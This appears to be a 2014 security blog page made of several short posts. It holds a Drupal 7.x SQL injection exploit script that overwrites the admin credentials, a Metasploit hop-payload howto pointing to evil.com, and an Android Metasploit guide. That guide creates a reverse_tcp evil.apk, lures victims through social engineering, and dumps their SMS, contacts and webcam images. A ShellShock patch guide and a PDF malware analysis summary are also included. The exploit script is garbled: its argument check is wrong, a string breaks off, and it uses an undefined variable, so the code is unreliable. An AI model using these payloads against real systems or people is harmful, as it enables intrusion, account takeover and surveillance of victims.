Oct 16, 2014

Ruxcon & Breakpoint - Material




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Drupal 7.x SQL Injection SA-CORE-2014-005

    #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
    #Creditz to https://www.reddit.com/user/fyukyuk
    import urllib2,sys
    from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    if len(sys.argv) != 3:
        print "host username password"
        print "http://nope.io admin wowsecure"
    hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = '%s/?q=node&destination=node' % host
    post_data = "name[0%20;update+users+set+name%3d\'" \
                +user \
                +"'+,+pass+%3d+'" \
                +hash[:55] \
    content = urllib2.urlopen(url=target, data=post_data).read()
    if "mb_strlen() expects parameter 1" in content:
            print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Hack In The Box 2014 - Material


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 15, 2014

Howto: Fix ShellShock in CentOS 4

First, follow the "Setup" procedure from http://bradthemad.org/tech/notes/patching_rpms.php.
Then run the following commands from your %_topdir:
wget http://ftp.redhat.com/redhat/linux/updates/enterprise/4ES/en/os/SRPMS/bash-3.0-27.el4.src.rpm
rpm -ivh bash-3.0-27.el4.src.rpm
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-017
cd ..
Patch SPECS/bash.spec with this diff:
< Release: 27%{?dist}
> Release: 27.2%{?dist}
> Patch17: bash30-017
< #%patch16 -p0 -b .016
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
Then finish with these commands:
rpmbuild -ba SPECS/bash.spec
sudo rpm -Uvh RPMS/i386/bash-3.0-27.2.i386.rpm
If someone knows an easy way to upload them, I'll put up my source and RPM.
Edit: The latest comments in the Red Hat Bugzilla say the patch is incomplete. The new ID is CVE-2014-7169.
Edit: There are two additional patches from gnu.org, so also download those into the same SOURCES directory:
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-018
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-019
Then also edit the SPECS/bash.spec as follows ("Release" numbering optional):
< Release: 27%{?dist}
> Release: 27.2.019%{?dist}
> Patch17: bash30-017
> Patch18: bash30-018
> Patch19: bash30-019
< #%patch16 -p0 -b .016
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
> %patch18 -p0 -b .018
> %patch19 -p0 -b .019 
Source:  http://serverfault.com/questions/631055/how-do-i-patch-rhel-4-for-the-bash-vulnerabilities-in-cve-2014-6271-and-cve-2014

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: PDF Analysis in 5 steps

  1. Find and Extract Javascript One technique is using Didier Stevens suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is Pdfid which can show several keywords used in PDF files that could be used to exploit vulnerabilities.
  2. Deobfuscate Javascript The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format in <image> tag.  This JavaScript code between tags needs to be extracted and place into a separated file. The same can be done for the chunk of base64 data, when decoded will produce a 67Mb BMP file.
  3. Extract the shellcode The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript
  4. Create a shellcode executable Next with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states ” The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its.
  5. Analyze shellcode and determine what is does. Final step is to determine what the shellcode does. To analyze the shellcode you could use a dissasembler or a debugger. In this case the a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. Further also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed
Source: http://countuponsecurity.com/2014/09/22/malicious-documents-pdf-analysis-in-5-steps/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: Brucon 2014



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 14, 2014

Howto: use PHP Hop payload of Metasploit

1. The payload is in the $(metasploit folder)/data/php/hop.php

2. Copy hop.php to any website that you want

3. In exploit module, use windows/meterpreter/reverse_hop_http for payload options and set HOPURL to website that you set up in step#2(In this example: http://www.evil.com/hop.php)

4. Exploit the client, if exploit success, client will visit http://www.evil.com/hop.php and send the session to hop.php. After that you will get the meterpreter session :)

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 13, 2014

Howto: Hacking Android with Metasploit

1. Create payload
# msfpayload android/meterpreter/reverse_tcp LHOST=hacker_ip LPORT=80 R > /var/www/evil.apk
2. Create Metasploit Listener
# msfconsole
msf> use multi/hundler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST hacker_ip
msf> set LPORT 80
msf> exploit

3. Social Engineering for lure victim to visit malicious website

4. After user install evil.apk and get the meterpreter
>> for get sms
> dump_sms
>> For web cams
> webcam_list
> webcam_snap
>> for get contacts 
> dump_contacts 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.